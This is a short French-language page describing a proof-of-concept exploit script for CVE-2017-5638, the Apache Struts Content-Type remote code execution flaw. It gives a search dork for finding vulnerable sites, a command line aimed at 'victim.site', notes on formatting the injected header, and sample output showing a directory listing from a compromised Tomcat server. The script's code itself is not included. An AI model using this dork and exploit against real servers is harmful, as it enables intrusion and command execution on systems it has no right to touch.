
Exemple de code PoC pour CVE-2017-5638 | Exploit Apache Struts
Exemple de code PoC pour CVE-2017-5638 | Exploit Apache Struts | DORK: ext:action
UTILISATION : python struts.py https://victim.site dir
Le script Python initial qui a été publié ne formatait pas correctement l'en-tête Content-Type. J'ai recodé l'en-tête Content-Type pour formater correctement Content-Type:%20{Exploit}. J'ai également ajouté un logging et Requests, puis j'ai déversé les propriétés de l'objet vers stdout.
EXEMPLE DE SORTIE
Vérification de CVE-2017-5638 par XSS.Cx
Le volume dans le lecteur D ne porte pas d'étiquette. Le numéro de série du volume est 2A7B-A245 Répertoire de d:\Program Files\Apache Software Foundation\Tomcat 9.0